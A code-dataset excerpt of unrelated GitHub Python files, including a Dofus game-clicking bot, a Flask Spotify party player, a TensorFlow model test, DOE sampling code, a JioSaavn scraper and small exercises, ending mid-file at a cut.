24\n\n # Loop over unique samples\n unique_samples = T[\"sample\"].unique()\n for sample_num in range(len(unique_samples)):\n # Filter data for the current sample\n sample_data = T[T[\"sample\"] == unique_samples[sample_num]]\n unique_track_ids = sample_data[\"TrackID\"].unique()\n plot_3d_movie(sample_data)\n print(\"leaving sample loop\")\n\n # msd = calculate_msd(sample_data, unique_track_ids)\n # plt.plot(np.arange(len(msd)) * time_spacing, msd, linewidth=2)\n # plt.xlabel(\"Time (min)\")\n # plt.ylabel(\"MSD/a0\")\n\n # plot_power_law_fits(msd, time_spacing)\n # plt.xscale(\"log\")\n # plt.yscale(\"log\")\n\n debugpy.breakpoint()\n print(\"closing program\")\n\n plt.show()\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"tandrewton/psm_extracellular_calculation","sub_path":"postprocessImarisCSV.py","file_name":"postprocessImarisCSV.py","file_ext":"py","file_size_in_byte":5481,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"28470962084","text":"def divisor(n):\n count = 1\n for i in range(1, n // 2 + 1):\n if n % i == 0:\n count += 1\n return count\n\n\ndef solution(left, right):\n return sum([item if divisor(item) % 2 == 0 else -item for item in range(left, right + 1)])\n\n\n# Test Cases\nprint(solution(13, 17))\nprint(solution(24, 27))\n\n\n\"\"\"\ndef solution(left, right):\n answer = 0\n for i in range(left,right+1):\n if int(i**0.5)==i**0.5:\n answer -= i\n else:\n answer += i\n return answer\n \n \n이런 방법이?\n\"\"\"\n","repo_name":"909ma/Repository-for-Study","sub_path":"프로그래머스/Python_약수의 개수와 덧셈.py","file_name":"Python_약수의 개수와 덧셈.py","file_ext":"py","file_size_in_byte":541,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"70811450488","text":"import numpy as np\nimport pyautogui\nimport time\n\nprint(pyautogui.size())\n\nscreenshot = pyautogui.screenshot()\nscreenshot = np.array(screenshot)\n\nL, H = pyautogui.size()[0], pyautogui.size()[1]\n\npixelTargetList = [[255, 160, 4], [178, 178, 185], [182, 19, 19], [252, 33, 25], [252, 30, 26], [68, 66, 54],\n [214, 202, 1]]\n\nTurn = 0\nStart = True\n\ntime.sleep(1)\n\nwhile True:\n\n screenshot = pyautogui.screenshot()\n screenshot = np.array(screenshot).tolist()\n\n # Nature\n if screenshot[990][1350] == [163, 205, 50]:\n # Fin combat\n if Turn > 0:\n print(\"Fin combat\")\n pyautogui.press(\"esc\")\n\n Turn = 0\n Start = True\n\n for i in range(H):\n flag = False\n for j in range(L):\n if screenshot[i][j] in pixelTargetList:\n pyautogui.moveTo(j, i, 0.5)\n pyautogui.leftClick()\n\n screenshot = pyautogui.screenshot()\n screenshot = np.array(screenshot).tolist()\n\n if screenshot[1000][1353] == [66, 213, 215]:\n flag = True\n break\n if flag == True:\n break\n\n # Combat\n else:\n\n screenshotFight = pyautogui.screenshot()\n screenshotFight = np.array(screenshotFight).tolist()\n\n if (Start):\n pyautogui.moveTo(1450, 1000, 0.5)\n pyautogui.leftClick()\n Start = False\n pyautogui.moveTo(10, 10, 0.5)\n\n if Turn == 0:\n\n if screenshotFight[1000][1353] == [66, 213, 215]:\n\n # Altéré N°1\n if screenshotFight[1020][981] == [109, 91, 118]:\n time.sleep(0.5)\n pyautogui.hotkey(\"ctrl\", \"'\")\n\n screenshotFight = pyautogui.screenshot()\n screenshotFight = np.array(screenshotFight).tolist()\n\n for i in range(H):\n flag1 = False\n for j in range(L):\n if screenshotFight[i][j] == [34, 51, 153]:\n pyautogui.moveTo(j, i, 0.5)\n time.sleep(0.5)\n pyautogui.leftClick()\n\n flag1 = True\n break\n if flag1 == True:\n break\n\n # Altéré N°2\n if screenshotFight[1020][1072] == [109, 91, 118]:\n time.sleep(0.5)\n pyautogui.hotkey(\"ctrl\", \"-\")\n\n screenshotFight = pyautogui.screenshot()\n screenshotFight = np.array(screenshotFight).tolist()\n\n for i in range(H):\n flag2 = False\n for j in range(L):\n if screenshotFight[i][j] == [34, 51, 153]:\n pyautogui.moveTo(j, i, 0.5)\n time.sleep(0.5)\n pyautogui.leftClick()\n\n flag2 = True\n break\n if flag2 == True:\n break\n\n # Liberté des altérés\n if screenshotFight[1000][1000] == [162, 134, 82]:\n time.sleep(0.5)\n pyautogui.press(\"'\")\n\n screenshotFight = pyautogui.screenshot()\n screenshotFight = np.array(screenshotFight).tolist()\n\n for i in range(H):\n flag3 = False\n for j in range(L):\n if screenshotFight[i][j] == [34, 51, 153]:\n pyautogui.moveTo(j, i, 0.5)\n time.sleep(0.5)\n pyautogui.leftClick()\n\n flag3 = True\n pyautogui.moveTo(10, 10, 0.5)\n break\n if flag3 == True:\n break\n Turn += 1\n else:\n time.sleep(0.5)\n pyautogui.press(\"f1\")\n","repo_name":"Derni300/DofusFARM","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4275,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"32666326386","text":"import os\nimport string\nimport random\nfrom typing import Tuple, Dict\nfrom pprint import pprint\nfrom conf import SECRET_KEY, CLIENT_ID, CLIENT_KEY, REDIRECT_URI\n# from server.models import Room\n\n\nfrom flask import Flask\nfrom flask_socketio import SocketIO\nfrom server.services import TickTimer\nimport spotify.sync as spotify\n\n\n# SPOTIFY_CLIENT = spotify.Client(CLIENT_ID, CLIENT_KEY)\n\n# APP = flask.Flask(__name__)\n\n# APP.config.from_mapping({'spotify_client': SPOTIFY_CLIENT})\n# APP.config['SECRET_KEY'] = SECRET_KEY\n\n# OAUTH2_SCOPES: Tuple[str] = ('user-modify-playback-state', 'user-read-currently-playing', 'user-read-playback-state')\n# OAUTH2: spotify.OAuth2 = spotify.OAuth2(SPOTIFY_CLIENT.id, REDIRECT_URI, scopes=OAUTH2_SCOPES)\n\n# APP.config['OAUTH2'] = OAUTH2\n\n# SPOTIFY_USERS: Dict[str, spotify.User] = {}\n\n\n\nclass Player(Flask):\n @staticmethod\n def create_app():\n \"\"\"\n Application factory\n \"\"\"\n\n app = Player(__name__)\n socketio = SocketIO(app)\n\n return app, socketio\n\n def setupSpotify(self):\n self.SPOTIFY_CLIENT = spotify.Client(CLIENT_ID, CLIENT_KEY)\n\n app.config.from_mapping({'spotify_client': self.SPOTIFY_CLIENT})\n app.config['SECRET_KEY'] = SECRET_KEY\n\n OAUTH2_SCOPES: Tuple[str] = ('user-modify-playback-state', 'user-read-currently-playing', 'user-read-playback-state', 'playlist-modify-public', 'playlist-modify-private')\n self.OAUTH2: spotify.OAuth2 = spotify.OAuth2(self.SPOTIFY_CLIENT.id, REDIRECT_URI, scopes=OAUTH2_SCOPES)\n\n app.config['OAUTH2'] = self.OAUTH2\n pprint(self.OAUTH2)\n\n self.SPOTIFY_USERS: Dict[str, spotify.User] = {}\n self.rooms = {}\n self.userToRoom: Dict[str, str] = {}\n\n def registerBlueprints(self):\n from server.blueprints import webPrint, spotifyPrint\n self.register_blueprint(webPrint)\n self.register_blueprint(spotifyPrint)\n\n def registerHelpers(self):\n from server.jinjaHelpers import timeToHuman\n self.add_template_filter(timeToHuman)\n\n def setup(self):\n self.setupSpotify()\n self.registerHelpers()\n self.registerBlueprints()\n\n def start(self, ip='127.0.0.1', port=8888, debug=True, doSetup=True):\n if doSetup:\n self.setup()\n self.timer = TickTimer()\n socketio.run(self, ip, port=port, debug=debug)\n self.timer.stop()\n\n\napp, socketio = Player.create_app()\n\n__all__ = [\n 'app',\n 'socketio',\n]","repo_name":"Spotify-party-player/server","sub_path":"server/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":2477,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"24452984405","text":"''' Macro module for summoner related macros '''\nimport asyncio\nimport time\n\nfrom client.account import get_username\nfrom client.exceptions import AccountChangeNeededException, LogoutNeededException\n\nfrom utils import naturaldelta\n\n\nasync def check_username_macro(logger, connection, username):\n ''' Checks if the current logged in account is correct '''\n checkpoint_time = time.time()\n logger.log('Getting username...')\n for _ in range(20):\n username_client = await get_username(connection)\n if username_client is None or username_client == '':\n await asyncio.sleep(1)\n continue\n\n if username.lower() != username_client.lower():\n logger.log(\n f'Expected username: {username.lower()}. '\n 'Current username: {username_client.lower()}')\n raise AccountChangeNeededException\n break\n else:\n raise LogoutNeededException\n logger.log('Got username, took {}'.format(naturaldelta(time.time() - checkpoint_time)))\n","repo_name":"pradishb/auto-disenchanter","sub_path":"macro/summoner.py","file_name":"summoner.py","file_ext":"py","file_size_in_byte":1030,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"77"} +{"seq_id":"26535794873","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Oct 8 17:21:03 2020\n\n@author: User\n\"\"\"\n\n\nimport tensorflow as tf\nfrom model import SimpleModel\nfrom utils import iterator_utils\nfrom utils.misc_utils import HParams, Files\nfrom os.path import join\nimport numpy as np\n\n\nTRAIN_FILES = Files(src_vcb_file = join('test_data', 'vcbs', 'src_vcb.txt'),\n trg_vcb_file = join('test_data', 'vcbs', 'trg_vcb.txt'),\n src_train = join('test_data', 'train', 'src.txt'),\n trg_train = join('test_data', 'train', 'trg.txt'),\n src_dev = join('test_data', 'dev', 'src.txt'),\n trg_dev = join('test_data', 'dev', 'trg.txt'),\n src_test = join('test_data', 'test', 'src.txt'),\n trg_test = join('test_data', 'test', 'trg.txt'))\n\nTRAIN_HPARAMS = HParams('TRAIN',\n filesobj = TRAIN_FILES,\n buffer_size = None,\n num_epochs = 1,\n batch_size = 2,\n model_type = 'simple_model',\n logdir = './logs/train_logs',\n src_embeddings_matrix_file = join('test_data', 'pretrained_embeddings',\n 'src_matrix.p'),\n trg_embeddings_matrix_file = join('test_data', 'pretrained_embeddings',\n 'trg_matrix.p'),\n num_units = 32,\n learning_rate = 3e-04,\n translation_file_path = None,\n num_steps_to_eval = None, \n chkpts_dir = './chkpts'\n )\n\n\n\nclass ModelTest(tf.test.TestCase):\n \n def setUp(self):\n \n super(ModelTest, self).setUp()\n \n self.graph = tf.Graph()\n \n self.sess = tf.Session(graph = self.graph)\n \n with self.graph.as_default():\n \n self.iterator, _ = iterator_utils.get_iterator('TRAIN',\n filesobj = TRAIN_FILES,\n buffer_size = TRAIN_HPARAMS.buffer_size,\n num_epochs = TRAIN_HPARAMS.num_epochs,\n batch_size = TRAIN_HPARAMS.batch_size,\n debug_mode = True)\n \n self.model = SimpleModel(TRAIN_HPARAMS, \n self.iterator, \n 'TRAIN')\n \n self.table_init_op = tf.tables_initializer()\n \n self.vars_init_op = tf.global_variables_initializer()\n \n \n def testGraphVariables(self):\n \n expected_variables = {'decoder/decoder_outter_scope/dense/kernel:0': (2 * self.model._num_units,\n 13),\n \n 'encoder/bidirectional_rnn/fw/lstm_cell/kernel:0': (3 + self.model._num_units,\n 4 * self.model._num_units),\n \n 'encoder/bidirectional_rnn/fw/lstm_cell/bias:0': (4 * self.model._num_units, ),\n \n 'encoder/bidirectional_rnn/bw/lstm_cell/kernel:0': (3 + self.model._num_units,\n 4 * self.model._num_units),\n \n 'encoder/bidirectional_rnn/bw/lstm_cell/bias:0': (4 * self.model._num_units, ),\n \n 'decoder/decoder_outter_scope/basic_lstm_cell/kernel:0': (3 + 2 * self.model._num_units,\n 4 * 2 * self.model._num_units),\n \n 'decoder/decoder_outter_scope/basic_lstm_cell/bias:0': (4 * 2 * self.model._num_units, )\n }\n \n with self.graph.as_default():\n \n var_names = [var.name for var in tf.trainable_variables()]\n \n self.assertAllEqual(sorted(var_names), sorted(list(expected_variables.keys())),\n 'variables are not compatible')\n \n with self.graph.as_default():\n \n for var in tf.trainable_variables():\n \n self.assertAllEqual(tuple(var.get_shape().as_list()),\n expected_variables[var.name],\n 'missed shapes at {}'.format(var.name))\n \n \n \n def testEmbeddingsMatrixCorrectness(self):\n \n self.sess.run(self.vars_init_op)\n \n \n src_matrix = self.model.source_embeddings_matrix.eval(session = self.sess)\n \n trg_matrix = self.model.target_embeddings_matrix.eval(session = self.sess)\n \n \n expected_src = np.ones(shape = (12, 3))\n \n expected_trg = np.ones(shape = (13, 3))\n \n \n self.assertAllEqual(expected_src, src_matrix, \n 'src matrix is wrong')\n \n self.assertAllEqual(expected_trg, trg_matrix, \n 'trg matrix is wrong')\n \n \n \n def testLossMaskFunction(self):\n \n res1 = np.array([[1, 1, 0, 0, 0, 0, 0],\n [1, 1, 1, 0, 0, 0, 0],\n [1, 1, 1, 1, 1, 1, 1]])\n \n res2 = np.array([[1, 1],\n [1, 1],\n [1, 1],\n [1, 1],\n [1, 1]])\n \n res3 = np.array([[1, 1, 1, 0, 0, 0, 0, 0, 0, 0],\n [1, 1, 0, 0, 0, 0, 0, 0, 0, 0],\n [1, 0, 0, 0, 0, 0, 0, 0, 0, 0],\n [1, 1, 1, 1, 0, 0, 0, 0, 0, 0],\n [1, 1, 1, 1, 1, 1, 0, 0, 0, 0],\n [1, 1, 1, 1, 0, 0, 0, 0, 0, 0],\n [1, 1, 1, 0, 0, 0, 0, 0, 0, 0],\n [1, 1, 1, 1, 1, 1, 1, 1, 1, 1]])\n \n \n with self.graph.as_default():\n \n with tf.name_scope('first_try'):\n \n try1 = self.model._return_loss_mask(tf.constant((2, 3, 7)),\n tf.constant(7))\n \n with tf.name_scope('second_try'):\n \n try2 = self.model._return_loss_mask(tf.constant((2, 2, 2, 2, 2)),\n tf.constant(2))\n \n with tf.name_scope('third_try'):\n \n try3 = self.model._return_loss_mask(tf.constant((3, 2, 1, 4, 6, 4, 3, 10)),\n tf.constant(10))\n \n exp1 = self.sess.run(try1)\n \n exp2 = self.sess.run(try2)\n \n exp3 = self.sess.run(try3)\n \n \n self.assertAllEqual(res1, exp1,\n 'first case is down')\n \n self.assertAllEqual(res2, exp2,\n 'second case is down')\n \n self.assertAllEqual(res3, exp3,\n 'third case is down')\n \n \n def testModelInitialLoss(self):\n \n loss_tensor = self.graph.get_tensor_by_name('loss/add:0')\n \n self.sess.run(self.table_init_op)\n \n self.sess.run(self.iterator.initializer)\n \n self.sess.run(self.vars_init_op)\n \n real_loss = self.sess.run(loss_tensor)\n \n ### Based on suggestion that on the very first step model \n ### does not know anything hence it should output equal\n ### probabilities for all the words in the target vcb\n \n expected_loss = -6 * np.log(1 / 13) #15.389696144769221\n \n self.assertAllClose(real_loss, expected_loss, \n atol = 0.3,\n msg = '{} vs {}'.format(real_loss, expected_loss))\n \n \nif __name__ == '__main__':\n \n tf.test.main()\n \n \n \n ","repo_name":"meduzick/cs224n_winter2019","sub_path":"a4/model_test.py","file_name":"model_test.py","file_ext":"py","file_size_in_byte":8590,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"4118806235","text":"import sys\nimport logging\nfrom logging.handlers import TimedRotatingFileHandler\n\n\nclass Logger:\n\n def __init__(self, \n log_file, \n log_format=\"[%(asctime)s][%(name)s][%(levelname)s] %(message)s\"):\n\n self.log_file = log_file\n self.formatter = logging.Formatter(log_format)\n \n def get(self, logger_name):\n logger = logging.getLogger(logger_name)\n logger.setLevel(logging.DEBUG)\n logger.addHandler(self.__get_file_handler__())\n logger.addHandler(self.__get_console_handler__())\n logger.propagate = False\n return logger\n\n def __get_console_handler__(self):\n console_handler = logging.StreamHandler(sys.stdout)\n console_handler.setFormatter(self.formatter)\n return console_handler\n\n def __get_file_handler__(self):\n file_handler = TimedRotatingFileHandler(self.log_file, when='midnight')\n file_handler.setFormatter(self.formatter)\n return file_handler\n\n\ndef get(logger_name, log_file='etl.log'):\n return Logger(log_file=log_file).get(logger_name)","repo_name":"alimghmi/crypto-news-etl","sub_path":"logger/logger.py","file_name":"logger.py","file_ext":"py","file_size_in_byte":1091,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"14557725256","text":"import sqlite3\n\nfrom PySide6.QtWidgets import QDialog, QGroupBox, QPushButton, QHBoxLayout, QWidget, QVBoxLayout, QCheckBox\n\n\nclass DelColDialog(QDialog):\n def __init__(self, table_name):\n super().__init__()\n self.__initVal()\n self.__initUi(table_name)\n\n def __initVal(self):\n self.__chkBoxes = []\n\n def __initUi(self, table_name):\n lay = QVBoxLayout()\n\n conn = sqlite3.connect('contacts.sqlite')\n cur = conn.cursor()\n\n mysel = cur.execute(f\"select * from {table_name}\")\n columnNames = list(map(lambda x: x[0], mysel.description))\n\n columnNames.remove('ID')\n columnNames.remove('Name')\n columnNames.remove('Job')\n columnNames.remove('Email')\n\n for columnName in columnNames:\n chkBox = QCheckBox(columnName)\n self.__chkBoxes.append(chkBox)\n lay.addWidget(chkBox)\n\n groupBox = QGroupBox()\n groupBox.setLayout(lay)\n\n self.__okBtn = QPushButton('OK')\n self.__okBtn.clicked.connect(self.accept)\n\n closeBtn = QPushButton('Close')\n closeBtn.clicked.connect(self.close)\n\n lay = QHBoxLayout()\n lay.addWidget(self.__okBtn)\n lay.addWidget(closeBtn)\n lay.setContentsMargins(0, 0, 0, 0)\n\n bottomWidget = QWidget()\n bottomWidget.setLayout(lay)\n\n lay = QVBoxLayout()\n lay.addWidget(groupBox)\n lay.addWidget(bottomWidget)\n\n self.setLayout(lay)\n\n self.setFixedSize(self.sizeHint().width(), self.sizeHint().height())\n\n def getColumnNames(self):\n return [checkbox.text() for checkbox in self.__chkBoxes if checkbox.isChecked()]\n","repo_name":"yjg30737/pyside-db-chart-mapping-example","sub_path":"pyside_db_chart_mapping_example/db/delColDialog.py","file_name":"delColDialog.py","file_ext":"py","file_size_in_byte":1678,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"77"} +{"seq_id":"14269141941","text":"import numpy as np\nnp.random.seed(42)\nimport os\nfrom pathlib import Path\nimport matplotlib.pyplot as plt\nfrom skopt.space import Space\nfrom skopt.sampler import Lhs\nfrom scipy.spatial.distance import pdist\nfrom explann_doe import fullfact, ff2n, ccdesign\nimport pandas as pd\nimport configparser\n\nclass CaseConfigParser(configparser.ConfigParser):\n def optionxform(self, optionstr):\n return optionstr\n\ndef config_to_dict(config):\n new_dict = {}\n for k, v in config._sections.items():\n new_dict[k] = {}\n for k_, v_ in v.items():\n try:\n new_dict[k][k_] = eval(v_)\n except:\n new_dict[k][k_] = v_\n return new_dict\n\ndef write_lhs_file(doe_variables, samples, path):\n variable_constants = []\n variable_variables = []\n variable_ranges = doe_variables.values()\n labels=','.join(['ID'] + [key for key in doe_variables.keys()])\n \n for var in variable_ranges:\n if not isinstance(var, tuple):\n variable_constants.append(var)\n elif var[0] == var[1]:\n variable_constants.append(var[0])\n else:\n variable_variables.append(var)\n\n space = Space(variable_variables)\n lhs = Lhs(criterion=\"maximin\", iterations=10000)\n x = lhs.generate(space.dimensions, samples)\n\n for xi in x:\n [xi.append(var) for var in variable_constants]\n\n p = Path(path)\n p.parent.mkdir(parents=True, exist_ok=True)\n with open(path, 'w') as f:\n f.write(f'{labels}\\n')\n for i in range(len(x)):\n f.write(f'{i+1}')\n for j in range(len(np.array(x)[i,:])):\n f.write(f', {np.array(x)[i,j]}')\n f.write('\\n')\n print(path)\n\ndef write_doe_file(config_file):\n\n config = CaseConfigParser()\n config.read(config_file)\n config = config_to_dict(config)\n\n \n DOE_VARIABLES = config['DOE_VARIABLES']\n #SAMPLES = config['DATASET']['SAMPLES']\n DOEFILE = config['DATASET']['DOEFILE']\n DATASET_ROOT = config['DATASET']['DATASET_ROOT']\n DOEFILE_PATH = f\"{Path(DATASET_ROOT) / Path(DOEFILE).resolve()}\"\n os.makedirs(Path(DOEFILE_PATH).resolve().parent, exist_ok=True)\n\n NVARS = config['DOE_VARIABLES'].__len__()\n ### ccc stands for central composite circunscribed\n DOE_FUNCTION = config['DOE_SAMPLING']['FUNCTION']\n KWARGS = config['DOE_SAMPLING_KWARGS']\n\n experimental_planning = DOE_FUNCTION(NVARS, **KWARGS )\n\n levels = np.unique(experimental_planning)\n\n DOE_VARIABLES_LEVELS = {}\n for var, var_range in DOE_VARIABLES.items():\n DOE_VARIABLES_LEVELS[var] = np.interp(levels, (levels.min(), levels.max()), var_range)\n\n np.set_printoptions(precision=5, suppress=True)\n\n converted_levels = np.array([array for array in DOE_VARIABLES_LEVELS.values()])\n \n experimental_planning_converted = np.copy(experimental_planning)\n for i in range(experimental_planning.shape[1]):\n experimental_planning_converted[:,i] = experimental_planning[:,i]*(converted_levels[i][-2]-np.mean(converted_levels[i])) + np.mean(converted_levels[i])\n\n experimental_planning_converted_ids = np.concatenate([np.arange(1,experimental_planning_converted.shape[0]+1)[:,None],experimental_planning_converted], axis=1)\n experimental_planning_converted_ids_dataframe = pd.DataFrame(data=experimental_planning_converted_ids, columns=['ID','Thickness','CP3_y','T0in','p0in','outerTemperature'])\n experimental_planning_converted_ids_dataframe.to_csv(DOEFILE_PATH, sep=',', index=False)\n \n","repo_name":"properallan/ihtc_repository","sub_path":"src/doe_sampling.py","file_name":"doe_sampling.py","file_ext":"py","file_size_in_byte":3517,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"42637257861","text":"\"\"\"\r\nModule to get today's top songs and playlists from Jio Saavn platform\r\n\"\"\"\r\n\r\nimport requests\r\nfrom bs4 import BeautifulSoup\r\n\r\n\r\ntopics_url='https://www.jiosaavn.com/new-releases/english'\r\nplaylists_url='https://www.jiosaavn.com/featured-playlists/english'\r\n\r\ndef music():\r\n response=requests.get(topics_url)\r\n r2=requests.get(playlists_url)\r\n\r\n page_contents=response.text\r\n page_contents2=r2.text\r\n\r\n doc= BeautifulSoup(page_contents,'html.parser')\r\n doc2= BeautifulSoup(page_contents2,'html.parser')\r\n a_tags=doc.find_all('a',class_='u-ellipsis u-color-js-gray')\r\n a_playlist_tags=doc2.find_all('a',class_='u-ellipsis u-color-js-gray')\r\n\r\n counter=1\r\n string1='___Top 10 Trending Songs___\\n'\r\n for i in a_tags[:10]:\r\n string1=string1+str(counter)+' -> '+i.text+'\\n'\r\n counter=counter+1\r\n\r\n counter=1\r\n string2='___Top 10 Trending Playlists___\\n'\r\n for i in a_playlist_tags[:10]:\r\n string2=string2+str(counter)+' -> '+i.text+'\\n'\r\n counter=counter+1\r\n \r\n return string1,string2 \r\n","repo_name":"sejalc22/Discord-Bot-for-Content-Aggregation-and-Summarization","sub_path":"music.py","file_name":"music.py","file_ext":"py","file_size_in_byte":1063,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"15264089549","text":"import sys\nfrom collections import deque\nread=sys.stdin.readline\n# DFS 정의\ndef dfs(graph,start,visited):\n global cnt\n visited[start]=True\n for node in graph[start]:\n if not visited[node]:\n cnt+=1\n dfs(graph,node,visited)\n \n\n# 컴퓨터 수\nN=int(read())\n# 컴퓨터 연결된 쌍의 수\nM=int(read())\n\ngraph=[[] for _ in range(N+1)]\n\nfor _ in range(M):\n a,b=map(int,read().split())\n graph[a].append(b)\n graph[b].append(a)\n\nvisited_arr=[False]*(N+1)\ncnt=0\ndfs(graph,1,visited_arr)\nprint(cnt)\n","repo_name":"commGom/pythonStudy","sub_path":"백준/210803_최단경로/2606바이러스_DFS.py","file_name":"2606바이러스_DFS.py","file_ext":"py","file_size_in_byte":552,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"42118666207","text":"import sys\n\nsys.path.insert(0, \"../../../\")\nimport sys\nimport os\nimport time\nimport subprocess\nimport threading\nfrom API import recorder, edit\n\nlock = threading.Lock()\nstart = round(time.time())\n\n\ndef meaning(w):\n with open(\"words.csv\", \"r\") as r:\n for line in r:\n word = line[:len(line) - 1].split(\",\")\n if word[0] == w:\n return word[1:]\n return\n\n\nmean = []\nfor i in range(1, 5):\n mean.append(meaning(sys.argv[i]))\n\n\ndef check(str1, l, w):\n print(\" Input is \" + l)\n for j in range(4):\n if l == w[j] and string[j] == \"-\":\n str1 = str1 + l\n else:\n str1 = str1 + string[j]\n return str1\n\n\ndef formation(w, q):\n print(\"Meaning of the word is: \")\n for meaning in mean[q]:\n print(meaning)\n\n k = 0\n str1 = \"\"\n global string\n string = \"\"\n if \"-\" not in w[:]:\n for i in range(0, len(w)):\n string = string + \"-\"\n for i in range(0, len(string)):\n str1 = str1 + string[i] + \" \"\n else:\n string = w\n str1 = w\n print(str1)\n str1 = \"\"\n while k < 15:\n k = k + 1\n str1 = \"\"\n letter = \"\"\n print(\"Enter letter: \")\n with lock:\n record = recorder.Recorder(\"../../../Language_Models/\", \"../../../Acoustic_Models/\", L_LIB=\"characters\",\n A_LIB=\"en-us\", DECODE=True, TRIALS=1,\n SILENCE=1)\n record.start()\n r = open('./test.hyp', 'r')\n arr = r.read().split(\" \")\n letter = arr[0]\n print(letter)\n lt = letter.lower()\n r.close()\n try:\n string = str(check(str1, lt, w))\n\n except Exception as e:\n print(e)\n\n str1 = \"\"\n for j in range(0, len(string)):\n str1 = str1 + string[j] + \" \"\n print(str1)\n if string == q or k == 15:\n return string\n elif int(round(time.time()) - start) >= 180:\n subprocess.call([\"espeak\", \"You lose\"])\n break\n return \"End\"\n\n\noutput = [\"\" for j in range(4)]\nmatrix = [[\"\" for x in range(4)] for y in range(4)]\n\n\ndef display():\n text = \"\"\n if output[0] != \"\":\n for t in range(4):\n matrix[int(sys.argv[5])][t] = output[0][t]\n if output[1] != \"\":\n for t in range(4):\n matrix[t][int(sys.argv[6])] = output[1][t]\n if output[2] != \"\":\n for t in range(4):\n matrix[t][int(sys.argv[6]) + 2] = output[2][t]\n if output[3] != \"\":\n for t in range(4):\n matrix[int(sys.argv[5]) + 2][t] = output[3][t]\n for i in range(4):\n for j in range(4):\n if matrix[i][j] == \"\":\n text = text + \"-\" + \" \"\n else:\n text = text + matrix[i][j] + \" \"\n print(text)\n text = \"\"\n\n\nn = 0\ns = 0\nm = 0\nz = 1\nwhile z:\n if len(output[n % 4]) == 0 and output[n % 4] != \"End\":\n output[n % 4] = formation(sys.argv[(n % 4) + 1], n % 4)\n m = m + 1\n print(m)\n elif output[n % 4] != sys.argv[(n % 4) + 1] and output[n % 4] != \"End\":\n output[n % 4] = formation(output[n % 4], n % 4)\n\n elif output[n % 4] == sys.argv[(n % 4) + 1] and output[n % 4] != \"End\":\n s = s + 1\n if s >= 4:\n subprocess.call([\"espeak\", \"You win\"])\n z = 0\n if output[n % 4] == \"End\":\n z = 0\n else:\n display()\n n = n + 1\n\nsubprocess.call([\"espeak\", \"-s\", \"125\", \" Options are 1: Resume and 2: Start another game\"])\n","repo_name":"AnirbanBanik1998/Modern_Speak_and_Spell","sub_path":"Game/Games/Crossword/maker.py","file_name":"maker.py","file_ext":"py","file_size_in_byte":3563,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"77"} +{"seq_id":"8585510879","text":"from estudiante import Estudiante\n\ndef run ():\n alumnos = []\n calificaciones = {}\n while (True):\n\n print(\"\"\"\n Bienvenido al programa para calcular notas de estudiantes.\n 1) para ingresar los nombres de los alumnos\n 2) para ingresar las notas\n 3) para imprimir alumno con su promedio\n 4) salir\n\n Digita tu opcion:\n \"\"\")\n\n entrie = int(input())\n\n if entrie == 1:\n print(\" ingresa la cantidad de alumnos: \")\n cant = int(input())\n \n for i in range(cant):\n \n name = input(f'ingresa el nombre del estudiante {i+1}: ')\n newperson = Estudiante(name)\n alumnos.append(newperson)\n\n if entrie == 2:\n\n for i in alumnos:\n print (f'ingrese las notas de {i.name}')\n nota1 = int(input(\"ingresa nota1: \"))\n nota2 = int(input(\"ingresa nota2: \"))\n nota3 = int(input(\"ingresa nota3: \"))\n nota4 = int(input(\"ingresa nota4: \"))\n nota5 = int(input(\"ingresa nota5: \"))\n\n name = i.name\n notafinal = i.promedio(nota1,nota2,nota3,nota4,nota5)\n\n calificaciones[name] = notafinal\n\n \n \n if entrie == 3:\n for alumno, nota in calificaciones.items():\n print (alumno + ' tuvo un promedio de : ' + str(nota))\n \n \n if entrie ==4:\n break\n\n \n \n \n\nif __name__ == '__main__':\n run()","repo_name":"felipedcp20/Ejercicios-Python","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1627,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"29069218037","text":"from flask import Flask\nfrom flask import render_template\nfrom logging.config import dictConfig\nfrom flask import request\nfrom flask import jsonify\nfrom google.cloud import language_v1\n\ndictConfig({\n 'version': 1,\n 'formatters': {'default': {\n 'format': '[%(asctime)s] %(levelname)s in %(module)s: %(message)s',\n }},\n 'handlers': {'wsgi': {\n 'class': 'logging.StreamHandler',\n 'stream': 'ext://flask.logging.wsgi_errors_stream',\n 'formatter': 'default'\n }},\n 'root': {\n 'level': 'INFO',\n 'handlers': ['wsgi']\n }\n})\n\napp = Flask(__name__)\n\n@app.route(\"/\")\ndef hello_world():\n return \"

Hello, alireza!

